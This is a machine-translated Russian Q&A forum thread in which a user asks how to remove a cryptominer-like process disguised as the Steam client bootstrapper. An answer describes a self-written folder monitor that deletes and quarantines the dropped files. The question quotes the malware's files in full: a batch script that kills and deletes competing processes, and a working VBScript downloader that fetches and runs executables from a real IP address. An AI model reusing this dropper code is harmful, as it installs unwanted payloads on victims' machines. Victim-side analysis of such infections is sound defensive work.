Как навсегда убить загрузчик клиента steam

у меня есть следующая ситуация в моем диспетчере задач:

Task Manager - Processes

Я не знаю, что это за приложение, но определенно не Steam client bootstrapper, потому что я его не устанавливал, а также не могу его удалить.

если я пытаюсь выяснить, что это за приложение через этот шаг:

Task Manager - Go to details

Я вижу что-то вроде это:

Task Manager - Details

в утилите MS Config я не нашел ничего похожего на secury.exe.

когда я открываю расположение файла, я вижу три файла:

m.bat,b.exe,4.vbs.

ниже идет содержание m.bat:

taskkill /f /t /im secury.exe
c:ProgramDatasecury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:WindowsSystem32soiuos.exe
del C:WindowsSetupTrustedInstaller.exe
del C:ProgramDatakingsoft.exe
del C:ProgramDataexpl0rer.exe
del C:ProgramDataieplare.exe
del C:ProgramDatanssm.exe
del C:ProgramDataMSASCui.exe
del C:ProgramDataSystemSettlngs.exe
del C:ProgramDataSystemSetting.exe
del C:ProgramDataProcess.exe
del C:ProgramDatawinlnlt.exe
del C:ProgramDataWindowsUpgrade.exe
del C:ProgramDatamsdc.exe
del C:ProgramDataFiddlere.exe
del C:ProgramDatashovst.exe
del C:ProgramDatalqrtqe.exe
del C:ProgramDataapkls.exe
del C:ProgramDatawinlog.exe
del C:ProgramDatasvchosts.exe
del C:ProgramDatawin1ogins.exe
del C:ProgramDatashovsts.exe
del C:ProgramDatafcty.exe
del C:ProgramDatapool.exe
del C:ProgramDatapool2.exe
del C:ProgramDatapool3.exe

Далее идет 4.vbs:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:ProgramDatas2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:ProgramDatapool2.exe",2
CreateObject("WScript.Shell").Run "C:ProgramDatapool3.exe"
CreateObject("WScript.Shell").Run "del C:ProgramDatapool3.exe"

что я могу сделать, чтобы остановить secury.exe от злоупотребления вычислительными мощностями моего сервера?

P. S. Я был казнен Аваст полную проверку моего компьютера, но ничего не нашел.

17
задан Nisse Engström
25.03.2023 5:22 Количество просмотров материала 2765
Распечатать страницу

1 ответ

Я хочу поделиться обходной путь, который я нашла для моей проблемы.

как программист, я создал программу, которая постоянно мониторит папку c:\ProgramData\ для новых файлов. И если некоторые из файлов, которые принадлежат "steam client Bootstrapper", появляются внутри этой папки, моя программа удаляет эти файлы до того, как они будут выполнены. Если кому-то нужно изменить эту утилиту, вы можете найти ее по адресу GitHub.

после того, как я выполнил этот примитивный антивирус (на самом деле antiPUP) моя система перестала быть медленным. Еще одна деталь, которая требуется для работы этой программы со стабильностью-это требование crate folder c:\ProgramData\copyForVirus\. Я сделал программу, чтобы создать копию этих вирусных файлов, чтобы проанализировать их позже в какой-то среде VM Ware для того, что внутренние этих файлов.

0
отвечен Yuriy Zaletskyy 2023-03-26 13:10

Постоянная ссылка на данную страницу: [ Скопировать ссылку | Сгенерировать QR-код ]

Ваш ответ

Опубликуйте как Гость или авторизуйтесь

Имя
Вверх